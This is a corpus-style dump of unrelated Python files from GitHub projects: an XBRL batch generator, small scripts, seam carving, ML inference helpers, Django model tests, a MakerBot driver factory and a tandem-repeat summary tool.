        ii: report id string (also used as the file stem).
    """
    json_dict = {
        "settings": {"reportId": ii},
        "offline": {
            "instance": name,
            "epUri": ep,
            "taxLocationRoot": "2023-03-31",
        },
        "orderList": [
            {
                "order": 0,
                "command": {
                    "name": "controlCore",
                    "renderingType": "file",
                    "stopIfError": "false",
                    "stepOverIfErrorLoadInstance": "true",
                    "filterList": ["enum2"],
                },
            }
        ],
    }
    # Bug fix: ensure_ascii=False writes raw non-ASCII characters, so the
    # file must be opened with an explicit utf-8 encoding; otherwise the
    # platform default (e.g. a Windows code page) can raise UnicodeEncodeError.
    with open(f'{path}\\jsons\\{ii}.json', 'w', encoding='utf-8') as f:
        json.dump(json_dict, f, ensure_ascii=False, indent=4)
i=0
# Batch-file header: switch the console to UTF-8 and pick the JVM binary.
run_str='chcp 65001\nset JAVA=java\n'
for xx in listdir:
    print(xx)
    i += 1
    with open(xx,'r',encoding='utf-8') as f:
        file_data=f.read()
    # Pull the entry-point schema URI out of the report's schemaRef element;
    # the root element may be either <xbrl> or namespace-prefixed <xbrli:xbrl>.
    soup=BeautifulSoup(file_data,'lxml')
    soup_root=soup.contents[1]
    if soup_root.find_next('xbrl'):
        ep = soup_root.find_next('xbrl').find('link:schemaref')['xlink:href']
    else:
        ep = soup_root.find_next('xbrli:xbrl').find('link:schemaref')['xlink:href']
    ii=f'{i}'
    # One adapter invocation per report, logging to <ii>.log.
    run_str=run_str+f"%JAVA% -Xms2048M -Xmx32000M -Dfile.encoding=UTF-8 -jar xwand7-adapter.jar --launch {ii} --config {ii}.json > {ii}.log 2>&1\n"
    make_json(base_path,xx,ep,ii)
    # Copy the report into its own datas\<ii> folder.
    path_folder=f'{base_path}\\datas\\{ii}\\'
    os.mkdir(f'{base_path}\\datas\\{ii}\\')
    shutil.copy2(xx, f'{path_folder}\\{xx}')
run_str=run_str+'pause'
os.chdir(base_path)
with open(f'run_enum.bat','w') as r:
    r.write(run_str)
11080034904 | your_age = input("Enter your current age (years): ")
wife_age = input("Enter your wife's age (years): ")
your_life = 90 - int(your_age)
wife_life = 90 - int(wife_age)
your_month = your_life * 12
wife_month = wife_life * 12
your_week = your_life * 52
wife_week = wife_life * 52
your_day = your_life * 365
wife_day = wife_life * 365
month_together = your_month if your_month < wife_month else wife_month
day_together = your_day if your_day < wife_day else wife_day
week_together = your_week if your_week < wife_week else wife_week
print(
"If you and your wife both live for 90 years,\n"
f"You have {your_day} days or {your_week} weeks or {your_month} months left.\n"
f"Your wife has {wife_day} days or {wife_week} weeks or {wife_month} months left.\n"
f"You and your wife can live together for {day_together} days or {week_together} weeks or {month_together} months"
) | aburifat/Small-Python-Projects | 003_90_years_to_live.py | 003_90_years_to_live.py | py | 889 | python | en | code | 0 | github-code | 13 |
17382034900 | import numpy as np
import energy
import findSeam
import reduceImage
def findTranspose(image, shapeReduction):
    '''
    Compute the bitmask which gives the order in which the seams must be removed.
    Parameters:
        image: Image to be reduced.
        shapeReduction: Tuple with 2 elements reduction in rows and columns.
    Returns:
        T: The matrix for dynamic programing.
        bitMask: Order in which the rows/columns need to be removed
                 (0 = horizontal seam/row, 1 = vertical seam/column).
    '''
    T = np.zeros((shapeReduction[0]+1, shapeReduction[1]+1), dtype='double')
    bitMask = np.ones_like(T) * -1
    # First column of T: cumulative cost of removing only horizontal seams.
    imageNoRow = image
    for i in range(1, T.shape[0]):
        e = energy.energyRGB(imageNoRow)
        optSeamMask, seamEnergyRow = findSeam.findSeam(e.T)
        imageNoRow = reduceImage.reduceImageByMask(imageNoRow, optSeamMask, 0)
        bitMask[i, 0] = 0
        T[i, 0] = T[i - 1, 0] + seamEnergyRow
    # First row of T: cumulative cost of removing only vertical seams.
    imageNoColumn = image
    for j in range(1, T.shape[1]):
        e = energy.energyRGB(imageNoColumn)
        optSeamMask, seamEnergyColumn = findSeam.findSeam(e)
        imageNoColumn = reduceImage.reduceImageByMask(imageNoColumn, optSeamMask, 1)
        bitMask[0, j] = 1
        T[0, j] = T[0, j - 1] + seamEnergyColumn
    # Fill the interior of T with dynamic programming.
    for i in range(1, T.shape[0]):
        imageWithoutRow = image
        for j in range(1, T.shape[1]):
            e = energy.energyRGB(imageWithoutRow)
            # Seam and seam energy in the horizontal direction.
            optSeamMaskRow, seamEnergyRow = findSeam.findSeam(e.T)
            imageNoRow = reduceImage.reduceImageByMask(imageWithoutRow, optSeamMaskRow, 0)
            # Seam and seam energy in the vertical direction.
            # Bug fix: the fresh vertical seam energy was bound to a
            # misspelled name (seamEnergyColumm) while a stale value from
            # the initialization loop above was used in the cost below.
            optSeamMaskColumn, seamEnergyColumn = findSeam.findSeam(e)
            imageNoColumn = reduceImage.reduceImageByMask(imageWithoutRow, optSeamMaskColumn, 1)
            # Choose the cheaper predecessor: index 0 = row removal,
            # index 1 = column removal.
            neighbors = [T[i - 1, j] + seamEnergyRow, T[i, j - 1] + seamEnergyColumn]
            ind = np.argmin(neighbors)
            T[i, j] = neighbors[ind]  # Updating T
            bitMask[i, j] = ind  # Updating bitMask
            # NOTE(review): the image state always advances with the
            # column-reduced image regardless of the chosen branch
            # (original behavior kept) — confirm whether it should follow
            # ``ind`` instead.
            imageWithoutRow = imageNoColumn
    # The original ended by computing and discarding one extra row-seam
    # reduction of the local ``image``; that dead code has been removed.
    return T, bitMask
9216063877 | # -*- coding: utf-8 -*-
# _author_ = 'hou'
# _project_: add_layer
# _date_ = 16/10/23 下午1:35
# about matrix multply: http://baike.baidu.com/view/2455255.htm
import tensorflow as tf
# activation_function=None : means 为线性函数
def add_layer(inputs, in_size, out_size, activation_function=None):
    """Add one fully-connected layer: inputs @ Weights + biases, optionally
    passed through activation_function.

    activation_function=None means the layer stays linear.
    NOTE(review): both Weights and biases are zero-initialized; the
    commented-out lines suggest random weights / 0.1 biases were intended.
    Zero weights keep hidden units symmetric during training — confirm
    this initialization is deliberate.
    """
    # Weights = tf.Variable(tf.random_normal([in_size, out_size]))
    # biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)
    Weights = tf.Variable(tf.zeros([in_size, out_size]))
    biases = tf.Variable(tf.zeros([out_size]))
    res = tf.matmul(inputs, Weights) + biases
    if activation_function is None:
        outputs = res
    else:
        outputs = activation_function(res)
    return outputs
| houweitao/TensorFlow | tensorFlowStudy/add_layer.py | add_layer.py | py | 715 | python | en | code | 0 | github-code | 13 |
16679842785 | import numpy as np
import cv2
import mxnet as mx
import argparse
import os
import time
start = time.time()  # wall-clock start; elapsed time is printed in __main__
path = "/Users/p439/Desktop/CapOFF/"  # NOTE(review): hard-coded local path to test images
saved_model_path = os.getcwd() + "/saved_model/"
prefix = saved_model_path + 'mymodel-new-ft'  # checkpoint file prefix
ctx = mx.cpu()  # run inference on CPU
batch_size = 1
epoch = 130  # which saved checkpoint epoch to load
# Load the symbol graph plus trained parameters and wrap them in a Module.
net, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)
net_model = mx.mod.Module(symbol = net, context = ctx)
def handler(iter, _ctx):
    """Classify grayscale images as CapOFF / CapON.

    Each image is resized to the network's 32x32 input, reshaped to
    (n, c, h, w) and run through the module-level ``net_model``.

    Returns a tuple ``(labels, predicted)`` where ``labels`` is a list of
    class names and ``predicted`` the raw probability rows.

    NOTE(review): ``predicted`` is overwritten on every loop iteration, so
    with more than one input image only the LAST image's prediction is
    labelled — confirm whether multi-image input is ever used.
    (The parameter name ``iter`` shadows the builtin but is kept for
    interface compatibility.)
    """
    for img in iter:
        img = cv2.resize(img, (32,32)) # resize to 32*32 to fit model input
        img = img.reshape([1,32,32])
        img = img[np.newaxis, :]  # extend to (n, c, h, w)
        img_iter = mx.io.NDArrayIter(img, None, batch_size)
        net_model.bind(for_training = False, data_shapes = img_iter.provide_data, label_shapes = None)
        net_model.set_params(arg_params, aux_params, allow_missing = True)
        predicted = net_model.predict(img_iter, 1)
    output = []
    # `probs` replaces the original loop variable `list`, which shadowed the builtin.
    for probs in predicted:
        if probs[0] == max(probs[0], probs[1]):
            output.append('CapOFF')
        elif probs[1] == max(probs[0], probs[1]):
            output.append('CapON')
        else:
            # Unreachable for a two-class row; kept as a defensive fallback.
            output.append('Nothing')
    return output, predicted
if __name__ == '__main__':
    # Smoke test: classify one image from the hard-coded folder and
    # report total elapsed time (model load + inference).
    image = path + "img208.jpg"
    img = cv2.cvtColor(cv2.imread(image), cv2.COLOR_BGR2GRAY)
    print(handler([img],None))
    print(time.time() - start)
| khan-farhan/Capon-Vs-Capoff | main.py | main.py | py | 1,443 | python | en | code | 0 | github-code | 13 |
3108079836 | """
In this exercise you will create a program that reads a letter of the alphabet from the user.
If the user enters a, e, i, o or u then your program should display a message
indicating that the entered letter is a VOWEL.
If the user enters y then your program should display a message
indicating that sometimes y is a VOWEL, and sometimes y is a CONSONANT.
Otherwise your program should display a message indicating that the letter is a CONSONANT.
"""
# START Definition of FUNCTIONS
def stringaValida(stringInput):
    """Return True iff the string is non-empty and contains only ASCII letters.

    Bug fix: the original fell through to ``return True`` for the empty
    string (the guard only skipped the character loop), so pressing Enter
    was accepted as valid input and the program printed nothing.
    """
    if stringInput == "":
        return False  # an empty word is not a valid entry
    for char in stringInput:
        # Accept only A-Z (65-90) and a-z (97-122).
        if not((65 <= ord(char) <= 90) or (97 <= ord(char) <= 122)):
            return False
    return True
def vowelOrConsonant(char):
    """Classify a single letter.

    Returns "Vowel" for a/e/i/o/u (any case), the special y message for
    y/Y, and "Consonant" otherwise. Replaces the original 12-way chained
    equality test with an idiomatic membership check — identical results.
    """
    lowered = char.lower()
    if lowered in "aeiou":
        return "Vowel"
    elif lowered == "y":
        return "Sometimes Vowel, sometimes Consonant"
    else:
        return "Consonant"
# END Definition of FUNCTIONS
# Acquisition and Control of the DATA entered by the USER
# Re-prompt until stringaValida accepts the word.
stringInput = input("Enter the WORD: ")
stringInputValidated = stringaValida(stringInput)
while not(stringInputValidated):
    print("Incorrect entry. Try again.")
    stringInput = input("Enter the WORD: ")
    stringInputValidated = stringaValida(stringInput)
# Displaying the RESULTS
# One classification line per letter of the validated word.
for char in stringInput:
    result = vowelOrConsonant(char)
    print(f'{char} = {result}')
8841879388 | import os
from datetime import timedelta
from django.conf import settings
from django.core.files.storage import default_storage
from django.test import override_settings
from django.test import TestCase
from django.utils.timezone import now
from djmoney.money import Money
from helpers.seed import get_or_create_default_image
from slider.models import Slide
from slider.models import Slider
# Language codes configured for this site in django-parler, plus the default.
languages = [lang["code"] for lang in settings.PARLER_LANGUAGES[settings.SITE_ID]]
default_language = settings.PARLER_DEFAULT_LANGUAGE_CODE
@override_settings(
    STORAGES={
        "default": {
            "BACKEND": "django.core.files.storage.memory.InMemoryStorage",
        },
    }
)
class SlideModelTestCase(TestCase):
    """Unit tests for the Slide model: field persistence, verbose names,
    per-language translations, string representations, image saving and
    the URL/filename helper properties.

    File storage is overridden to the in-memory backend so no media files
    touch the real filesystem.
    """
    slide: Slide = None
    slider: Slider = None
    def setUp(self):
        # One Slider with a single Slide, translated into every configured language.
        image = get_or_create_default_image("uploads/slides/no_photo.jpg")
        date_start = now()
        self.slider = Slider.objects.create()
        self.slide = Slide.objects.create(
            discount=0.0,
            show_button=True,
            image=image,
            date_start=date_start,
            date_end=date_start + timedelta(days=30),
            slider=self.slider,
        )
        for language in languages:
            self.slide.set_current_language(language)
            self.slide.name = f"Slide 1_{language}"
            self.slide.url = "https://www.example.com/"
            self.slide.title = f"Slide Title_{language}"
            self.slide.description = f"Slide Description_{language}"
            self.slide.button_label = f"Slide Button Label_{language}"
            self.slide.save()
        self.slide.set_current_language(default_language)
    def test_fields(self):
        # Test if the fields are saved correctly
        self.assertEqual(self.slide.discount, Money("0.0", settings.DEFAULT_CURRENCY))
        self.assertTrue(self.slide.show_button)
        self.assertTrue(default_storage.exists(self.slide.image.path))
    def test_verbose_names(self):
        # Test verbose names for fields
        self.assertEqual(
            Slide._meta.get_field("image").verbose_name,
            "Image",
        )
        self.assertEqual(
            Slide._meta.get_field("discount").verbose_name,
            "Discount",
        )
        self.assertEqual(
            Slide._meta.get_field("show_button").verbose_name,
            "Show Button",
        )
    def test_meta_verbose_names(self):
        # Test verbose names from the Meta class
        self.assertEqual(
            Slide._meta.verbose_name,
            "Slide",
        )
        self.assertEqual(
            Slide._meta.verbose_name_plural,
            "Slides",
        )
    def test_unicode_representation(self):
        # Test the __unicode__ method returns the translated name
        self.assertEqual(
            self.slide.__unicode__(),
            self.slide.safe_translation_getter("name"),
        )
    def test_translations(self):
        # Test if translations are saved correctly for every language
        for language in languages:
            self.slide.set_current_language(language)
            self.assertEqual(self.slide.name, f"Slide 1_{language}")
            self.assertEqual(self.slide.title, f"Slide Title_{language}")
            self.assertEqual(self.slide.description, f"Slide Description_{language}")
            self.assertEqual(self.slide.button_label, f"Slide Button Label_{language}")
    def test_str_representation(self):
        # Test the __str__ method returns the translated name
        self.assertEqual(
            str(self.slide),
            self.slide.safe_translation_getter("name"),
        )
    def test_save(self):
        # Re-saving with an image should (re)generate the thumbnail file too.
        self.slide.image = get_or_create_default_image("uploads/slides/no_photo.jpg")
        self.slide.save()
        self.assertTrue(default_storage.exists(self.slide.thumbnail.path))
        self.assertTrue(default_storage.exists(self.slide.image.path))
    def test_main_image_absolute_url(self):
        # Test if main_image_absolute_url returns APP_BASE_URL + storage URL
        expected_url = settings.APP_BASE_URL + self.slide.image.url
        self.assertEqual(self.slide.main_image_absolute_url, expected_url)
    def test_main_image_filename(self):
        # Test if main_image_filename returns just the basename of the image
        expected_filename = os.path.basename(self.slide.image.name)
        self.assertEqual(self.slide.main_image_filename, expected_filename)
    def tearDown(self) -> None:
        super().tearDown()
        self.slide.delete()
        self.slider.delete()
| vasilistotskas/grooveshop-django-api | tests/integration/slider/test_model_slide.py | test_model_slide.py | py | 4,545 | python | en | code | 4 | github-code | 13 |
31322322372 | from __future__ import absolute_import, print_function
import os
import threading
import makerbot_driver
class ReturnObject(object):
    """Plain attribute container; MachineFactory.build_from_port sets the
    attributes 's3g', 'profile' and 'gcodeparser' on instances of it."""
    def __init__(self):
        pass
class MachineFactory(object):
    """This class is a factory for building machine drivers from
    a port connection. This class will take a connection, query it
    to verify it is a genuine 3d printer (or other device we can control)
    and build the appropriate machine type/version/etc from that.
    """
    def __init__(self, profile_dir=None):
        # Default to the 'profiles' directory next to this module.
        if profile_dir:
            self.profile_dir = profile_dir
        else:
            self.profile_dir = os.path.join(
                os.path.abspath(os.path.dirname(__file__)), 'profiles',)
    def create_inquisitor(self, portname):
        """
        Factory hook for a MachineInquisitor; exists so tests can override
        it instead of assigning internal objects by hand.
        """
        return MachineInquisitor(portname)
    def build_from_port(self, portname, leaveOpen=True, condition=None):
        """
        Returns a ReturnObject with attributes s3g, profile and gcodeparser
        for a machine at port portname (all None when no profile matches).
        """
        machineInquisitor = self.create_inquisitor(portname)
        if None is condition:
            condition = threading.Condition()
        s3gBot, machine_setup_dict = machineInquisitor.query(condition, leaveOpen)
        profile_regex = self.get_profile_regex(machine_setup_dict)
        matches = makerbot_driver.search_profiles_with_regex(
            profile_regex, self.profile_dir)
        matches = list(matches)
        return_object = ReturnObject()
        # Pre-set all result attributes to None so callers can test them.
        attrs = ['s3g', 'profile', 'gcodeparser']
        for a in attrs:
            setattr(return_object, a, None)
        if len(matches) > 0:
            # First regex match wins; copy the queried settings onto the profile.
            bestProfile = matches[0]
            setattr(return_object, 's3g', s3gBot)
            profile = makerbot_driver.Profile(bestProfile, self.profile_dir)
            profile.values['print_to_file_type']=[machine_setup_dict['print_to_file_type']]
            profile.values['software_variant'] = machine_setup_dict['software_variant']
            profile.values['tool_count_error'] = machine_setup_dict['tool_count_error']
            setattr(return_object, 'profile', profile)
            parser = makerbot_driver.Gcode.GcodeParser()
            parser.s3g = s3gBot
            parser.state.profile = getattr(return_object, 'profile')
            setattr(return_object, 'gcodeparser', parser)
        return return_object
    def create_s3g(self, portname):
        """
        This is made to ameliorate testing. Otherwise we would
        not be able to reliably test the build_from_port function
        w/o being permanently attached to a specific port.
        """
        return makerbot_driver.s3g.from_filename(portname)
    def get_profile_regex(self, machine_setup_dict):
        """
        Decision tree mapping queried machine info to a profile regex.
        @param dict machine_setup_dict: A dictionary containing
          information about the connected machine
        @return str regex, or None when nothing matches
        """
        regex = None
        # First check for VID/PID matches
        if 'vid' in machine_setup_dict and 'pid' in machine_setup_dict:
            regex = self.get_profile_regex_has_vid_pid(machine_setup_dict)
        if '.*Replicator2' == regex:
            # if the pid does not belong to the legacy Rep2's then no toolcount
            # inquiry is necessary, return the Rep2 regex
            if(makerbot_driver.get_vid_pid_by_name('The Replicator 2')[1] ==
               machine_setup_dict['pid']):
                pass
            elif regex and machine_setup_dict.get('tool_count', 0) == 2:
                regex = regex + 'X'
            elif machine_setup_dict.get('tool_count', 0) != 1:
                regex = None
        elif '.*Replicator2X' == regex:
            pass
        else:
            # Older generation: disambiguate by toolhead count.
            if regex and machine_setup_dict.get('tool_count', 0) == 1:
                regex = regex + 'Single'
            elif regex and machine_setup_dict.get('tool_count', 0) == 2:
                regex = regex + 'Dual'
            else:
                regex = None
        return regex
    def get_profile_regex_has_vid_pid(self, machine_setup_dict):
        """If the machine has a VID and PID, we can assume it is part of
        the generation of machines that also have a tool_count.  We use the
        tool_count at the final criterion to narrow our search.
        """
        vid_pid_matches = []  # NOTE(review): unused local, kept for byte-compatibility
        for machine in makerbot_driver.gMachineClasses.values():
            if machine['vid'] == machine_setup_dict['vid'] and machine_setup_dict['pid'] in machine['pid']:
                return machine['machineProfiles']
        return None
class MachineInquisitor(object):
    def __init__(self, portname):
        """ build a machine Inquisitor for an exact port"""
        self._portname = portname
    def create_s3g(self, condition):
        """
        Factory hook for the s3g driver; exists so tests can override it
        instead of assigning internal objects by hand.
        """
        return makerbot_driver.s3g.from_filename(self._portname, condition)
    def query(self, condition, leaveOpen=True):
        """
        open a connection to a machine and query a machine for
        key settings needed to construct a machine from a profile
        @param leaveOpen If true, serial connection to the machine is left open.
        @return a tuple of (s3gObj, dict of settings: vid/pid/tool_count/
            tool_count_error/software_variant/print_to_file_type)
        """
        import makerbot_driver.s3g as s3g
        settings = {}
        s3gDriver = self.create_s3g(condition)
        s3gDriver.clear_buffer()
        settings['vid'], settings['pid'] = s3gDriver.get_vid_pid()
        firmware_version = s3gDriver.get_version()
        try:
            s3gDriver.init_eeprom_reader(firmware_version)
        except makerbot_driver.EEPROM.MissingEepromMapError:
            # No EEPROM map for this firmware; proceed without a reader.
            pass
        settings['tool_count'] = s3gDriver.get_toolhead_count()
        # Fall back to a single toolhead when the reported count is invalid.
        if settings['tool_count'] not in makerbot_driver.constants.valid_toolhead_counts :
            settings['tool_count'] = 1
            settings['tool_count_error'] = True
        else:
            settings['tool_count_error'] = False
        try:
            # Non-zero SoftwareVariant means the newer x3g file format.
            version_settings = s3gDriver.get_advanced_version();
            settings['software_variant'] = hex(version_settings['SoftwareVariant'])
            if version_settings['SoftwareVariant'] != 0:
                s3gDriver.set_print_to_file_type('x3g')
                settings['print_to_file_type'] = 'x3g'
            else:
                s3gDriver.set_print_to_file_type('s3g')
                settings['print_to_file_type'] = 's3g'
        except makerbot_driver.CommandNotSupportedError:
            # Older firmware without get_advanced_version: assume s3g.
            s3gDriver.set_print_to_file_type('s3g')
            settings['software_variant'] = hex(0)
            settings['print_to_file_type'] = 's3g'
        # Normalize one-digit variants, e.g. '0x1' -> '0x01'.
        if len(settings['software_variant'].split('x')[1]) == 1:
            settings['software_variant'] = settings['software_variant'].replace('x', 'x0')
        if not leaveOpen:
            s3gDriver.close()
        return s3gDriver, settings
| AstroPrint/AstroBox | src/ext/makerbot_driver/MachineFactory.py | MachineFactory.py | py | 7,180 | python | en | code | 158 | github-code | 13 |
72963580179 | import argparse
import os.path as op
import json
import math
import sys
import pandas as pd
from collections import Counter
from multiprocessing import Pool, cpu_count
from . import __version__
from .meta import TREDsRepo
from .utils import DefaultHelpParser
def left_truncate_text(a, maxcol=30):
    # Truncate each string in `a` to at most `maxcol` characters, keeping the
    # RIGHT end and prefixing "..."; non-string items pass through unchanged.
    # NOTE: `basestring` (and the print >> statements below) mean this module
    # targets Python 2.
    trim = lambda t: (t if not isinstance(t, basestring) \
            or len(t) <= maxcol else "..." + t[-(maxcol - 3):])
    return [trim(x) for x in list(a)]
def get_tred_summary(df, tred, repo, minPP=.5, casesfw=None, detailsfw=None):
    """Summarize one TRED locus across all samples in `df`.

    Writes risk cases to `casesfw` and per-sample read-depth details to
    `detailsfw` (when given), and returns
    (tred_object, n_prerisk, n_risk, n_carrier, allele_freq_string).
    """
    pf1 = tred + ".1"
    pf2 = tred + ".2"  # larger allele column; used for carrier calls below
    tr = repo[tred]
    row = tr.row
    title = row["title"]
    inheritance = row["inheritance"]
    repeat = row["repeat"]
    repeat_location = row["repeat_location"]
    cutoff_prerisk, cutoff_risk = tr.cutoff_prerisk, tr.cutoff_risk
    label = tred + ".label"
    pp = tred + ".PP"
    prerisk = df[df[label] == "prerisk"]
    # Risk requires the label AND a posterior probability above minPP.
    risk = df[(df[label] == "risk") & (df[pp] > minPP)]
    # Carrier definition depends on whether the disease allele is an
    # expansion (>= cutoff) or a contraction (0 < allele <= cutoff).
    if tr.is_expansion:
        carrier = df[(df[label] != "risk") & (df[pf2] >= cutoff_risk)]
    else:
        carrier = df[(df[label] != "risk") & (df[pf2] <= cutoff_risk) \
                        & (df[pf2] > 0)]
    risk = risk.copy()  # copy so the display truncation below doesn't touch df
    n_prerisk = prerisk.shape[0]
    n_risk = risk.shape[0]
    n_carrier = carrier.shape[0]
    calls = tred + ".calls"
    core = ["SampleKey", "inferredGender", calls]
    columns = core + [tred + ".FR", tred + ".PR", tred + ".RR", pp]
    # Truncate the display of FR/PR
    risk[tred + ".FR"] = left_truncate_text(risk[tred + ".FR"])
    risk[tred + ".PR"] = left_truncate_text(risk[tred + ".PR"])
    risk[tred + ".RR"] = left_truncate_text(risk[tred + ".RR"])
    if detailsfw:
        details_columns = core[:]
        details_columns.extend([tred + ".FDP", tred + ".PDP",
                                tred + ".RDP", tred + ".PEDP"])
        for idx, row in risk[details_columns].iterrows():
            if tred == "AR":
                break  # AR locus is excluded from the details report
            samplekey, sex, calls, fdp, pdp, rdp, pedp = row
            fdp = int(fdp)
            pdp = int(pdp)
            rdp = int(rdp)
            pedp = int(pedp)
            atoms = [tred, tr.inheritance, samplekey, sex, calls, fdp, pdp, rdp, pedp]
            print >> detailsfw, "\t".join(str(x) for x in atoms)
    pt = risk[columns]
    if n_risk:
        # Human-readable block per locus with at least one risk sample.
        print >> casesfw, "[{}] - {}".format(tred, title)
        print >> casesfw, "rep={}".format(repeat), "inherit={}".format(inheritance),\
              "cutoff={}".format(cutoff_risk), \
              "n_risk={}".format(n_risk), \
              "n_carrier={}".format(n_carrier), \
              "loc={}".format(repeat_location)
        print >> casesfw, pt.to_string(index=False)
        print >> casesfw
    # Allele frequency
    cnt = Counter()
    cnt.update(df[tred + ".1_"])
    cnt.update(df[tred + ".2_"])
    del cnt[-1]  # -1 is the missing-value sentinel; drop it from the counts
    return tr, n_prerisk, n_risk, n_carrier, counts_to_af(cnt)
def counts_to_af(counts):
    """Serialize an allele-size counter as "{size:count,...}", sorted by
    size, skipping '.' and NaN keys."""
    parts = []
    for size, count in sorted(counts.items()):
        if size == '.' or math.isnan(size):
            continue
        parts.append("{}:{}".format(size, count))
    return "{" + ",".join(parts) + "}"
def df_to_tsv(df, tsvfile, extra_columns=[], jsonformat=True,
              ref="hg38"):
    """Write the per-sample calls dataframe to `tsvfile`.

    Adds integer allele columns (<tred>.1_/.2_) and a combined
    "<a>|<b>" calls column per locus, masks the second allele for males
    at X-linked loci (JSON input only), then writes the selected columns
    sorted by SampleKey. Returns the augmented dataframe.
    """
    df = df.fillna(-1)  # -1 marks missing calls (see del cnt[-1] upstream)
    dd = ["SampleKey"]
    if jsonformat:
        dd += ["inferredGender"]
    repo = TREDsRepo(ref)
    for tred in repo.names:
        tr = repo[tred]
        if tred + ".1" not in df.columns:
            continue
        df[tred + ".1_"] = df[tred + ".1"].astype("int")
        df[tred + ".2_"] = df[tred + ".2"].astype("int")
        # Males are hemizygous at X-linked loci: blank the second allele.
        if jsonformat and tr.is_xlinked:
            df.loc[(df["inferredGender"] == "Male"), tred + ".2_"] = "."
        df[tred + ".calls"] = ["{}|{}".format(a, b) for (a, b) in
                               zip(df[tred + ".1_"], df[tred + ".2_"])]
    all_columns = ["calls", "label"] + extra_columns
    columns = dd + sorted([x for x in df.columns if (x not in dd) and \
                           any(x.endswith("." + z) for z in all_columns)])
    # NOTE(review): reindex_axis was removed in modern pandas — this module
    # appears pinned to an old pandas/Python 2 stack.
    tf = df.reindex_axis(columns, axis='columns')
    tf.sort_values("SampleKey")
    tf.to_csv(tsvfile, sep='\t', index=False)
    print >> sys.stderr, "TSV output written to `{}` (# samples={})"\
        .format(tsvfile, tf.shape[0])
    return df
def vcf_to_df_worker(vcffile):
    """ Convert VCF to data frame, single thread.

    Returns a flat dict for one sample: SampleKey (taken from the file
    name) plus, per record ID, the two GB alleles as ints and the
    PP/FR/PR/LABEL fields of the first sample column.
    """
    import vcf
    samplekey = op.basename(vcffile).split(".")[0]
    reader = vcf.Reader(open(vcffile, "rb"))
    d = {'SampleKey': samplekey}
    for rec in reader:
        tr = rec.ID
        sample = rec.samples[0]
        a, b = sample["GB"].split("/")  # genotype pair, e.g. "12/34"
        d[tr + ".1"] = int(a)
        d[tr + ".2"] = int(b)
        for k in ["PP", "FR", "PR"]:
            d[tr + "." + k] = sample[k]
        d[tr + ".label"] = sample["LABEL"]
    return d
def vcf_to_df(vcffiles, tsvfile, cpus):
    """
    Compile a number of vcf files into tsv file for easier manipulation.
    Parses the files in parallel with `cpus` workers; one row per file.
    (`tsvfile` is unused here; writing happens later in df_to_tsv.)
    """
    df = pd.DataFrame()
    p = Pool(processes=cpus)
    results = []
    r = p.map_async(vcf_to_df_worker, vcffiles,
                    callback=results.append)
    r.wait()
    for res in results:
        df = df.append(res, ignore_index=True)
    return df
def json_to_df_worker(jsonfile):
    """Parse one tredparse JSON file into a flat dict of SampleKey + calls."""
    js = json.load(open(jsonfile))
    samplekey = js['samplekey']
    results = js['tredCalls']
    # We'll infer sample key from file names for now since the keys are not
    # properly populated in v0.6.4 and v0.6.5
    samplekey = op.basename(jsonfile).split(".")[0]
    d = {'SampleKey': samplekey}
    d.update(results)
    return d
def json_to_df(jsonfiles, tsvfile, cpus):
    """
    Compile a number of json files into tsv file for easier manipulation.
    Parses the files in parallel with `cpus` workers; one row per file.
    (`tsvfile` is unused here; writing happens later in df_to_tsv.)
    """
    df = pd.DataFrame()
    p = Pool(processes=cpus)
    results = []
    r = p.map_async(json_to_df_worker, jsonfiles,
                    callback=results.append)
    r.wait()
    for res in results:
        df = df.append(res, ignore_index=True)
    return df
def main(args):
    """Command-line entry point: parse VCF/JSON call files (or reuse an
    existing tsv), then write the tsv, a per-locus summary report, the
    outlier cases file and the read-count details file."""
    p = DefaultHelpParser(description=__doc__, prog=op.basename(__file__),
                          formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    p.add_argument("files", nargs="*")
    p.add_argument('--ref', help='Reference genome version',
                   choices=("hg38", "hg38_nochr", "hg19", "hg19_nochr"), default='hg38')
    p.add_argument('--tsv', default="out.tsv",
                   help="Path to the tsv file")
    p.add_argument('--columns',
                   help="Columns to extract, use comma to separate")
    p.add_argument('--minPP', default=.5, type=float,
                   help="Minimum Prob(pathological) to report cases")
    p.add_argument('--cpus', default=cpu_count(),
                   help='Number of threads')
    p.add_argument('--version', action='version', version="%(prog)s " + __version__)
    args = p.parse_args(args)
    files = args.files
    ref = args.ref
    tsvfile = args.tsv
    columns = args.columns.split(",") if args.columns else []
    repo = TREDsRepo(ref)
    alltreds = repo.names
    if files:
        # Input format is decided from the first file's extension.
        nfiles = len(files)
        cpus = min(nfiles, args.cpus)
        jsonformat = files[0].endswith(".json")
        suffix = "JSON" if jsonformat else "VCF"
        print >> sys.stderr, "Using {} cpus to parse {} {} files"\
            .format(cpus, nfiles, suffix)
        if jsonformat:
            df = json_to_df(files, tsvfile, cpus)
        else:
            df = vcf_to_df(files, tsvfile, cpus)
        df = df_to_tsv(df, tsvfile, extra_columns=columns, jsonformat=jsonformat,
                       ref=ref)
    else:
        # No inputs: fall back to a previously written tsv.
        if op.exists(tsvfile):
            df = pd.read_csv(tsvfile, sep="\t")
        else:
            sys.exit(not p.print_help())
    if df.empty:
        print >> sys.stderr, "Dataframe empty - check input files"
        sys.exit(1)
    reportfile = tsvfile + ".report.txt"
    summary = pd.DataFrame()
    total_prerisk = total_risk = total_carrier = total_loci = 0
    # Outlier cases and associated read count details
    cases = tsvfile + ".cases.txt"
    casesfw = open(cases, "w")
    details = tsvfile + ".details.txt"
    detailsfw = open(details, "w")
    header = "Locus,Inheritance,SampleKey,Sex,Calls,FullReads,PartialReads,"\
             "RepeatReads,PairedReads"
    print >> detailsfw, "\t".join(header.split(','))
    for tred in alltreds:
        if tred + ".label" not in df.columns:
            continue
        # Per-locus summary; also appends to the cases/details files.
        tr, n_prerisk, n_risk, n_carrier, af = \
            get_tred_summary(df, tred, repo, minPP=args.minPP,
                             casesfw=casesfw, detailsfw=detailsfw)
        total_prerisk += n_prerisk
        total_risk += n_risk
        total_carrier += n_carrier
        if n_risk:
            total_loci += 1
        tr = tr.row
        columns = ["abbreviation", "title", "motif", "inheritance",
                   "cutoff_prerisk", "cutoff_risk"]
        d = dict((c, tr[c]) for c in columns[1:])
        d["abbreviation"] = tred
        d["n_prerisk"] = n_prerisk
        d["n_risk"] = n_risk
        d["n_carrier"] = n_carrier
        d["allele_freq"] = af
        summary = summary.append(d, ignore_index=True)
